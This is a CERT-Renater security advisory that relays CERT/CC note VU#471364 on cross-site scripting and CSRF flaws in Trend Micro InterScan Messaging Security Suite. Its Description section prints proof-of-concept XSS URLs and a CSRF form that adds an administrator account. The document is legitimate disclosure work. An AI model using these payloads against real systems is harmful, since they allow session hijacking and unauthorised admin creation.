====================================================================

                             CERT-Renater

                  Note d'Information No. 2012/VULN362
____________________________________________________________________

DATE                : 14/09/2012

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S) : Systems running Trend Micro InterScan Messaging
                           Security Suite.

======================================================================
http://www.kb.cert.org/vuls/id/471364
______________________________________________________________________

Vulnerability Note VU#471364

Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and
CSRF vulnerabilities


Original Release date: 13 sept. 2012 | Last revised: 13 sept. 2012


Overview

Trend Micro InterScan Messaging Security Suite is susceptible to
cross-site scripting and cross-site request forgery vulnerabilities.


Description

Trend Micro InterScan Messaging Security Suite is susceptible to
cross-site scripting (CWE-79) and cross-site request forgery (CWE-352)
vulnerabilities.

Cross-site scripting (CVE-2012-2995) (CWE-79)
Persistent/Stored XSS
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>

Non-persistent/Reflected XSS
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>

Cross-site request forgery (CVE-2012-2996) (CWE-352)
CSRF add admin privilege account
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra&#46;123" />
<input type="hidden" name="confirmPwd" value="quorra&#46;123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>
Impact

An unauthenticated attacker may be able to execute arbitrary script in
the context of a logged in user's session.


Solution

We are currently unaware of a practical solution to this problem. Please
consider the following workarounds.

Restrict access

As a general good security practice, only allow connections from
trusted hosts and networks. Restricting access would prevent an
attacker from accessing the InterScan Messaging Security Suite using
stolen credentials from a blocked network location.


Vendor Information (Learn More)
Vendor	Status	Date Notified	Date Updated
Trend Micro	Affected	10 Aug 2012	12 Sep 2012

If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)
Group 	Score 	Vector
Base 	6,8 	AV:N/AC:M/Au:N/C:P/I:P/A:P
Temporal 	5,5 	E:POC/RL:U/RC:UC
Environmental 	5,5 	CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND


References

    http://cwe.mitre.org/data/definitions/352.html
    http://cwe.mitre.org/data/definitions/79.html

http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html


Credit

Thanks to Tom Gregory for reporting this vulnerability.

This document was written by Jared Allar.


Other Information

    CVE IDs: CVE-2012-2995 CVE-2012-2996
    Date Public: 13 sept. 2012
    Date First Published: 13 sept. 2012
    Date Last Updated: 13 sept. 2012
    Document Revision: 11

Feedback

If you have feedback, comments, or additional information about this
vulnerability, please send us email.

This product is provided subject to this Notification and this Privacy
& Use policy.

======================================================================

=========================================================
Serveur de référence du CERT-Renater
https://services.renater.fr/ssi/
=========================================================
+ CERT-RENATER          | tel : 01-53-94-20-44          +
+ 23 - 25 Rue Daviel    | fax : 01-53-94-20-41          +
+ 75013 Paris           | email: certsvp@renater.fr     +
=========================================================